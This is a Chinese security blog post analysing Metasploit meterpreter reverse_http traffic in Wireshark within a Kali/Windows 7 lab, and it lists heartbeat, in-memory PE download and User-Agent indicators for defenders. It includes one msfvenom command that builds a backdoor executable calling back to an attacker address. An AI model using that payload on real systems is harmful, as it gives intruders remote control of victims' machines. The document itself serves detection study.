环境准备
-
Kali (攻击机)
-
Windows7 (靶机)
-
Wireshark (流量分析)
流量分析
exe程序
首先用msfvenom生成exp,上传到web服务器供靶机下载
msfvenom -p windows/meterpreter/reverse_http -f exe lhost=192.168.192.119 lport=1234 -o /var/www/html/1.exe
Wireshark设置过滤条件
ip.addr == 192.168.192.119 && ip.addr == 192.168.192.113
靶机运行后门程序,我们来看下流量变化
可以看到一个明显的特征,靶机每隔一段时间都会跟攻击机进行一次TCP通信,这也就是所谓的心跳包
, 告诉攻击机, 我依然在线,接着追踪下TCP流,看看干了什么
可以清晰的看到, 靶机会通过GET访问攻击机所监听的端口, 请求一个较长的文件
, 文件特征包含MZ标头和DOS模式异常
, 初步判断这是一个可执行文件
但是我们的磁盘中又没有发现新增文件, 所以大概率就是存储在内存中了, 这也是一种常见的免杀方法, 叫做文件不落地
, 可以有效地逃逸杀软,还有一个比较明显的特征, 就是User-Agent
, 默认的User-Agent为Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
特征总结
-
动态特征
-
心跳包
-
请求一个不正常的文件
-
静态特征
-
响应包中的MZ标头和DOS模式异常
-
User-Agent
后续思考
红蓝对抗中蓝军如何有效地反制红军?
-
设置大量
蜜罐
, 干扰红军进攻思路, 消耗时间与精力 -
PUA反制
, 根据现有的流量特征, 伪造并发送流量包, 使其误以为我们上线了, 但是执行不了任何命令, 且长时间无回显, 对红军的认知系统进行打击
作者: Erikten
链接: http://www.erikten.cn/posts/548680ac.html
本文章著作权归作者所有,任何形式的转载都请注明出处。
好文推荐
欢迎关注 系统安全运维
每日坚持分享好工具好资源,麻烦各位师傅文章底部给点个“再看”,感激不尽
本文始发于微信公众号(系统安全运维):恶意流量分析之metasploit
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论